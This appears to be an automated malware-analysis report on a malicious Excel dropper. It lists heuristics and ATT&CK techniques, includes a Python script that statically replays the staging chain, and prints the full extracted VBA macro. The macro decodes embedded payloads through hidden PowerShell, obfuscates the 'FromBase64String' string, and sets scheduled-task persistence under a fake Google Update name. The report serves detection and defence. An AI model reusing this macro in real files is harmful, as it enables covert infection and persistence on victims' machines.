MALICIOUS
488
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The Workbook_Open macro calls doom_Init, which reads three base64-encoded payloads from cells X1, Y1 and Z1 (Cells(1, 24) to Cells(1, 26)) of a worksheet named 'Incompatible'; the companion routine doom_ShowHideSheets then hides the first sheet and activates the second. doom_Init creates %PUBLIC%\Libraries\RecordedTV\ with the subfolders up, dn and tp, and uses WScript.Shell to run a hidden (window style 0) PowerShell one-liner that decodes the cell contents and writes them to disk as backup.vbs, DnE.ps1 and DnS.ps1. The two .ps1 files are stored as 'powershell -EncodedCommand <base64 of the UTF-16LE script>' wrappers, and the DnE.ps1 body has the placeholder '__' replaced with a Get-Random value before it is encoded. A second hidden command registers a scheduled task named 'GoogleUpdateTasksMachineUI' that runs backup.vbs every 3 minutes; the whole chain runs only if backup.vbs is not already present, so the macro is idempotent on re-opening. No network download happens in the macro itself: the payloads are embedded in the workbook, so this is a self-contained dropper with scheduled-task persistence. The string 'FromBase64String' is split across VBA concatenations ('FromBas" & "e64String') to defeat naive string matching on the macro source.
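The staging chain can be replayed statically to reconstruct the dropped files without detonating the sample. The Python below is an added example, not code from the analyzer or from the sample: it assumes placeholder base64 cell values (the real contents of the 'Incompatible' sheet are not shown in this report) and fixes the Get-Random value with a seeded generator; decode_encoded_command also unwraps the -EncodedCommand lines found in a recovered DnE.ps1 or DnS.ps1.

```python
"""Static emulation of the doom_Init staging chain (added example, not part of the report).

Reproduces what the hidden PowerShell one-liner does with the three cells of the
'Incompatible' sheet so the dropped files can be rebuilt from the workbook offline.
The three cell values are constructed placeholders; the real cell contents are not on the page.
"""
import base64
import random
import re

# wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"  (left unexpanded here)
DROP_DIR = "%PUBLIC%\\Libraries\\RecordedTV\\"

# Constructed stand-ins for Worksheets("Incompatible").Cells(1,24) / (1,25) / (1,26), i.e. X1, Y1, Z1.
CELL_BACKUP_VBS = base64.b64encode(b'WScript.Echo "backup stub"').decode("ascii")
CELL_DNE_PS1 = base64.b64encode(b'$id = "__"; Write-Output "DnE $id"').decode("ascii")
CELL_DNS_PS1 = base64.b64encode(b'Write-Output "DnS"').decode("ascii")


def decode_cell(cell_b64: str) -> str:
    """[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(cell))"""
    return base64.b64decode(cell_b64).decode("utf-8")


def encoded_command(script: str) -> str:
    """Build the line the one-liner writes to DnE.ps1 / DnS.ps1:
    'powershell -EncodedCommand "' + base64(UTF-16LE bytes of script) + '"'."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f'powershell -EncodedCommand "{blob}"'


def decode_encoded_command(line: str) -> str:
    """Reverse the wrapper: recover the script from a 'powershell -EncodedCommand ...' line."""
    m = re.search(r'-EncodedCommand\s+"?([A-Za-z0-9+/=]+)"?', line, re.IGNORECASE)
    if not m:
        raise ValueError("no -EncodedCommand payload found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def stage(cell_backup: str, cell_dne: str, cell_dns: str, rng=None) -> dict:
    """Return {path: content} as the PowerShell one-liner would write the three files."""
    rng = rng or random.Random(0)  # deterministic stand-in for Get-Random; the real value differs per victim
    files = {}
    # Set-Content '<pth>backup.vbs' $f
    files[DROP_DIR + "backup.vbs"] = decode_cell(cell_backup)
    # $f = $f -replace '__',(Get-Random)   (Get-Random with no arguments: 0 .. [int]::MaxValue)
    dne = decode_cell(cell_dne).replace("__", str(rng.randint(0, 2**31 - 1)))
    files[DROP_DIR + "DnE.ps1"] = encoded_command(dne)
    files[DROP_DIR + "DnS.ps1"] = encoded_command(decode_cell(cell_dns))
    return files


# cmd2 in the macro: persistence via a scheduled task that re-runs backup.vbs every 3 minutes
SCHTASKS_CMD = ('schtasks /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr '
                + DROP_DIR + "backup.vbs")

if __name__ == "__main__":
    for path, content in stage(CELL_BACKUP_VBS, CELL_DNE_PS1, CELL_DNS_PS1).items():
        print(path)
        print("  on disk :", content[:72])
        if path.endswith(".ps1"):
            print("  decoded :", decode_encoded_command(content))
    print(SCHTASKS_CMD)
```

To run this against the real sample, read X1:Z1 of the 'Incompatible' sheet (for example with xlrd for a legacy .xls, or openpyxl for .xlsm) and pass the three strings to stage(); the returned paths and contents are the on-disk artifacts to hunt for, and the schtasks line gives the task name for persistence checks.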
Heuristics (11)
- ClamAV: Xls.Dropper.Agent-6465255-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-6465255-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched lines in script:
  Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
  Set wss = CreateObject("WScript.Shell")
  Set fso = CreateObject("Scripting.FileSystemObject")
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched lines in script:
  End If
  cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encod …
  cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
  Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
  Set wss = CreateObject("WScript.Shell")
  Set fso = CreateObject("Scripting.FileSystemObject")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script:
  Attribute VB_Customizable = True
  Private Sub Workbook_Open()
  Call doom_Init
- Reference to PowerShell (high, SC_STR_POWERSHELL)
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND): Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lure bodies this is a visible 'run this' instruction; in macro-laden Office files it is the macro's own string-pool entries appearing adjacent in the extracted text.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3325 bytes |

SHA-256: 7ff419cb3d5c950ba3bb9f4a60ce2f41e1512353fc2978cc30040425c5597f9e
Detection (ClamAV): Vbs.Trojan.Oilrig-6332898-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call doom_Init
    Call doom_ShowHideSheets
End Sub
Sub doom_ShowHideSheets()
    If ActiveWorkbook.Worksheets(1).Visible Then
        Dim WS_Count As Integer
        Dim I As Integer
        WS_Count = ActiveWorkbook.Worksheets.Count
        For I = 1 To WS_Count
            ActiveWorkbook.Worksheets(I).Visible = True
        Next I
        ActiveWorkbook.Worksheets(1).Visible = False
        ActiveWorkbook.Worksheets(2).Activate
    End If
End Sub
Sub doom_Init()
    Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
    Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
    Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
    Set wss = CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
    If Not (fso.FolderExists(pth)) Then
        fso.CreateFolder (pth)
    End If
    cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
    cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
    If Not (fso.FileExists(pth & "backup.vbs")) Then
        If Not (fso.FolderExists(pth & "up")) Then
            fso.CreateFolder (pth & "up")
        End If
        If Not (fso.FolderExists(pth & "dn")) Then
            fso.CreateFolder (pth & "dn")
        End If
        If Not (fso.FolderExists(pth & "tp")) Then
            fso.CreateFolder (pth & "tp")
        End If
        wss.Run cmd, 0
        wss.Run cmd2, 0
        Set wss = Nothing
        Set fso = Nothing
    End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True